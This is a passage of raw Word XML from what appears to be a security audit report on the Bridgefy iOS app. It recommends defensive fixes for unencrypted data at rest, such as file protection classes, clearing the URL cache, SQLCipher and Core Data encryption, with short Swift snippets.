    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Output:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>5 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>protected_files.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="31"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>125 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>unprotected_files</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="365"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>It is recommended to add the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Data Protection </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>capability at the application level</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>51</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>This will ensure that application data files are protected at rest with the strongest form of encryption</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>available</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="80"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>iOS:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="69"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>NSFileProtectionComplete</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>52</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="69"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Furthermore,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="69"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="69"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>order</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="69"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="0" distR="0" allowOverlap="1" layoutInCell="1" locked="0" behindDoc="1" simplePos="0" relativeHeight="487602176">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>914400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>162797</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1828800" cy="1270"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapTopAndBottom/>
                <wp:docPr id="44" name="Graphic 44"/>
                <wp:cNvGraphicFramePr>
                  <a:graphicFrameLocks/>
                </wp:cNvGraphicFramePr>
                <a:graphic>
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvPr id="44" name="Graphic 44"/>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2.818726pt;width:144pt;height:.1pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:paragraph;z-index:-15714304;mso-wrap-distance-left:0;mso-wrap-distance-right:0" id="docshape33" coordorigin="1440,256" coordsize="2880,0" path="m1440,256l4320,256e" filled="false" stroked="true" strokeweight=".75pt" strokecolor="#000000">
                <v:path arrowok="t"/>
                <v:stroke dashstyle="solid"/>
                <w10:wrap type="topAndBottom"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="110"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>51</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="59"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId88">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://developer.apple.com/documentation/.../com_apple_developer_default-data-protection</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0"/>
        <w:ind w:left="0" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>52</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-13"/>
          <w:sz w:val="20"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:hyperlink r:id="rId89">
        <w:r>
          <w:rPr>
            <w:color w:val="1154CC"/>
            <w:spacing w:val="-2"/>
            <w:sz w:val="20"/>
            <w:u w:val="single" w:color="1154CC"/>
            <w:vertAlign w:val="baseline"/>
          </w:rPr>
          <w:t>https://developer.apple.com/documentation/foundation/nsfileprotectioncomplete</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BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="373"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>protect the cached entries, it is possible to subclass </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>NSURLCache </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>with a custom subclass that stores URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>responses</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>custom</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>SQLite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>database</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>with</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>protection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>set to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>NSFileProtectionComplete</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>53</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>. Alternatively, before the request is sent, caching could be disabled with a code snippet similar to the one shown below.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Proposed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>fix</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>used</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>before</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>request</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>sent):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>configuration</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.requestCachePolicy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.reloadIgnoringCacheData</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="56"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:right="378"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>An alternative mitigatory action could be to clear all cached responses after the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="40"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>response is received.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Proposed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>fix</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>after</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>response</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>received):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>URLCache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="785CA2"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>.shared.removeAllCachedResponses</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="113"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="276" w:lineRule="auto" w:before="0"/>
        <w:ind w:left="720" w:right="370" w:firstLine="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>In addition to the above,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Cipher</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>54</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>could</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>considered</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>encrypt</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>SQLite</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>databases at rest. The encryption key should be stored in the iOS keychain while data remains protected. For additional mitigation guidance, please see the blog post titled “</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Best practices to avoid security vulnerabilities in your iOS app</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>55</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="38"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Finally,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>it</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>is</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>recommended</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>enable</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>encryption</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>for</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Core</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Data</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>items:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Affected</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>File:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="38"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:i/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>bridgefy-app-ios/Bridgefy/CoreData/CoreDataStack.swift</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="76"/>
        <w:rPr>
          <w:i/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Proposed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>fix</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>be</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>used</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>before</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>persisting</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>items):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="37"/>
        <w:ind w:left="720" w:right="0" w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas"/>
          <w:color w:val="333333"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>container = NSPersistentContainer(name: </w:t>
      </w:r>
